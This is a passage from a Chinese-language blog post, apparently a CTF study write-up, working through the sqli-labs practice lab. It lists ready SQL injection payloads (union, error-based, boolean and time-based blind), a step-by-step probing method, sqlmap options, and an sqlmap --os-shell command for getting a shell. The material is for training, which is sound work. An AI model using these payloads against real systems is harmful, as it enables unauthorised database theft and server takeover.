<p>replace() 过滤 <code>&#39;\</code> ，将 <code>&#39;</code> 转化为 <code>\&#39;</code> ，将 <code>\</code>  转为 <code>\\</code>，将 <code>&quot;</code> 转为 <code>\&quot;</code> 。使用 GBK 处理。<br>addslaches() 返回在预定义字符之前添加反斜杠<code>\</code>的字符串。预定义字符：<code>&#39;</code> , <code>&quot;</code> , <code>\</code> 。使用 GBK 处理。<br>mysql_real_escape_string()</p>
</blockquote>
<h2 id="sqli-labs"><a href="#sqli-labs" class="headerlink" title="sqli-labs"></a>sqli-labs</h2><p>来刷 sqli-labs。此外，会有一些关于注入的总结。上文提到的和没提到的都会总结一下。</p>
<h3 id="常见注入内容"><a href="#常见注入内容" class="headerlink" title="常见注入内容"></a>常见注入内容</h3><figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">database()</span><br><span class="line">group_concat(table_name) <span class="keyword">from</span> information_schema.tables <span class="keyword">where</span> table_schema<span class="operator">=</span>database()</span><br><span class="line">group_concat(column_name) <span class="keyword">from</span> information_schema.columns <span class="keyword">where</span> table_schema<span class="operator">=</span>database() <span class="keyword">and</span> table_name<span class="operator">=</span><span class="string">&#x27;&lt;table_name&gt;&#x27;</span></span><br><span class="line">group_concat(<span class="operator">&lt;</span>column_name1<span class="operator">&gt;</span>,<span class="operator">&lt;</span>column_name2<span class="operator">&gt;</span>,...) <span class="keyword">from</span> <span class="operator">&lt;</span>table_name<span class="operator">&gt;</span></span><br></pre></td></tr></table></figure>

<h3 id="注入方法总结"><a href="#注入方法总结" class="headerlink" title="注入方法总结"></a>注入方法总结</h3><p>以下注入内容用@@@代替。</p>
<h4 id="联合查询"><a href="#联合查询" class="headerlink" title="联合查询"></a>联合查询</h4><figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">union</span><span class="operator">+</span><span class="keyword">select</span><span class="operator">+</span><span class="number">1</span>,<span class="number">1</span>,@@@<span class="comment">--+</span></span><br></pre></td></tr></table></figure>

<h4 id="报错注入-xml"><a href="#报错注入-xml" class="headerlink" title="报错注入-xml"></a>报错注入-xml</h4><figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">and</span><span class="operator">+</span>extractvalue(<span class="number">1</span>,concat(<span class="number">0x7e</span>,@@@))<span class="comment">--+</span></span><br><span class="line"><span class="keyword">and</span><span class="operator">+</span>updatexml(<span class="number">1</span>,concat(<span class="number">0x7e</span>,@@@), <span class="number">1</span>)<span class="comment">--+</span></span><br></pre></td></tr></table></figure>

<p>如果内容太长，需要用substr剪裁。</p>
<h4 id="布尔盲注"><a href="#布尔盲注" class="headerlink" title="布尔盲注"></a>布尔盲注</h4><figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">and</span><span class="operator">+</span><span class="keyword">left</span>(@@@,<span class="number">1</span>)<span class="operator">&gt;</span><span class="string">&#x27;r&#x27;</span><span class="comment">--+</span></span><br></pre></td></tr></table></figure>

<h4 id="延时盲注"><a href="#延时盲注" class="headerlink" title="延时盲注"></a>延时盲注</h4><figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">and</span><span class="operator">+</span>if(ascii(substr(@@@,<span class="number">1</span>,<span class="number">1</span>))<span class="operator">&gt;</span><span class="number">114</span>,<span class="number">1</span>,sleep(<span class="number">2</span>))<span class="comment">--+</span></span><br></pre></td></tr></table></figure>

<h3 id="注入步骤总结"><a href="#注入步骤总结" class="headerlink" title="注入步骤总结"></a>注入步骤总结</h3><ol>
<li><p>首先确定注入点，需要有一个可以控制的参数，如<code>?id=1</code>。之后，围绕<code>id</code>进行攻击。</p>
</li>
<li><p>确定 SQL 命令拼接方式。</p>
<p> 测试是字符类型还是数字类型，如果是字符类型，测试引号类型。方法：引入显著错误，尝试直到能成功报错为止。</p>
 <figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">?id=1</span><br><span class="line">?id=1+and+1=2--+        # 如果报错，则为数字型，否则为字符类型。id=$id</span><br><span class="line">?id=1&#x27;+and+1=2--+       # 如果报错，则为单引号。id=&#x27;$id&#x27;</span><br><span class="line">?id=1&quot;+and+1=2--+       # 如果报错，则为双引号。id=&quot;$id&quot;</span><br></pre></td></tr></table></figure>

<p> 接着测试有没有括号。去掉引入的显著错误，在参数右边添加反单括号和注释直到不报错为止。</p>
 <figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">?id=1))--+              # 数字型。例子中id=(($id))</span><br><span class="line">?id=1&#x27;))--+             # 单引号型。例子中id=((&#x27;$id&#x27;))</span><br><span class="line">?id=1&quot;))--+             # 双引号型。例子中id=((&quot;$id&quot;))</span><br></pre></td></tr></table></figure>
</li>
<li><p>确定注入大小。</p>
 <figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?id=&#x27;order+by+3--+      # 不断增大`order by`的大小直到报错为止。</span><br></pre></td></tr></table></figure>
</li>
<li><p>尝试联合注入。</p>
</li>
<li><p>尝试报错注入。</p>
</li>
<li><p>尝试盲注。</p>
</li>
<li><p>尝试dumpfile.</p>
</li>
</ol>
<h3 id="sqlmap"><a href="#sqlmap" class="headerlink" title="sqlmap"></a>sqlmap</h3><p>由于盲注要一个一个一个注入，很麻烦，可以直接用 sqlmap 来方便快捷地注入。</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">sqlmap</span><br><span class="line">-u &lt;URL with payload&gt;</span><br><span class="line">--dbms MySQL        <span class="comment"># 数据库类型</span></span><br><span class="line">--random-agent      <span class="comment"># 随机 agent</span></span><br><span class="line">--flush-session     <span class="comment"># 清空 session</span></span><br><span class="line">--technique B       <span class="comment"># 布尔盲注</span></span><br><span class="line">--technique T       <span class="comment"># 延时盲注</span></span><br><span class="line">-v 3                <span class="comment"># 输出信息等级</span></span><br><span class="line">--delay 0.05        <span class="comment"># 延迟，避免 too many requests</span></span><br><span class="line">--thread 4          <span class="comment"># 多线程，不要用，不稳定</span></span><br></pre></td></tr></table></figure>

<p>sqlmap 好用但是不能完全依赖她，不然<del>和脚本小子没区别</del>容易错过一些关键信息，这个软件 bug 还是有点多的，用好是一门学问。</p>
<h3 id="Page-1-Basic-Challenges"><a href="#Page-1-Basic-Challenges" class="headerlink" title="Page 1 Basic Challenges"></a>Page 1 Basic Challenges</h3><h4 id="Less-1-4"><a href="#Less-1-4" class="headerlink" title="Less-1~4"></a>Less-1~4</h4><p>联合查询。</p>
<h4 id="Less-5-6"><a href="#Less-5-6" class="headerlink" title="Less-5~6"></a>Less-5~6</h4><p>报错注入。</p>
<h4 id="Less-7-10"><a href="#Less-7-10" class="headerlink" title="Less-7~10"></a>Less-7~10</h4><p>盲注。就算没有报错信息但是还是能够布尔注入，交给万能的 sqlmap 只需要提升<code>--level</code>和<code>--risk</code>就行。官方提示是dump，但是测试的平台没有开放写文件到网页的权限。如果想用 sqlmap 找写文件点，用这一条命令：<code>sqlmap -u &quot;&lt;URL with payload&gt;&quot; --os-shell --delay 0.1</code></p>

    </div>

    
    
    

    <footer class="post-footer">
          <div class="post-tags">
              <a href="/tags/CTF/" rel="tag"># CTF</a>
              <a href="/tags/SQL%E6%B3%A8%E5%85%A5/" rel="tag"># SQL注入</a>
              <a href="/tags/sqli-labs/" rel="tag"># sqli-labs</a>
          </div>

        

          <div class="post-nav">
            <div class="post-nav-item">
                <a href="/2023/08/23/Mangas-And-Animes-to-Watch/" rel="prev" title="漫画番剧补完计划">
                  <i class="fa fa-angle-left"></i> 漫画番剧补完计划
                </a>
            </div>
            <div class="post-nav-item">
                <a href="/2023/08/30/Webshell-Introduction/" rel="next" title="Webshell 入门">
                  Webshell 入门 <i class="fa fa-angle-right"></i>
                </a>
            </div>
          </div>
    </footer>
  </article>
</div>






</div>
  </main>

  <footer class="footer">
    <div class="footer-inner">

  <div class="copyright">
    &copy; 
    <span itemprop="copyrightYear">2023</span>
    <span class="with-love">
      <i class="star-o"></i>
    </span>
    <span class="author" itemprop="copyrightHolder">az1mus</span>
  </div>

    </div>
  </footer>

  
  <div class="toggle sidebar-toggle" role="button">
    <span class="toggle-line"></span>
    <span class="toggle-line"></span>
    <span class="toggle-line"></span>
  </div>
  <div class="sidebar-dimmer"></div>

<noscript>
  <div class="noscript-warning">Theme NexT works best with JavaScript enabled</div>
</noscript>


  
  <script src="https://cdnjs.cloudflare.com/ajax/libs/animejs/3.2.1/anime.min.js" integrity="sha256-XL2inqUJaslATFnHdJOi9GfQ60on8Wx1C2H8DYiN1xY=" crossorigin="anonymous"></script>
<script src="/js/comments.js"></script><script src="/js/utils.js"></script><script src="/js/motion.js"></script><script src="/js/schemes/muse.js"></script><script src="/js/next-boot.js"></script>

  






  




  

  <script class="next-config" data-name="enableMath" type="application/json">false</script><script class="next-config" data-name="mathjax" type="application/json">{"enable":true,"tags":"none","js":{"url":"https://cdnjs.cloudflare.com/ajax/libs/mathjax/3.2.2/es5/tex-mml-chtml.js","integrity":"sha256-MASABpB4tYktI2Oitl4t+78w/lyA+D7b/s9GEP0JOGI="}}</script>
<script src="/js/third-party/math/mathjax.js"></script>



</body>
</html>
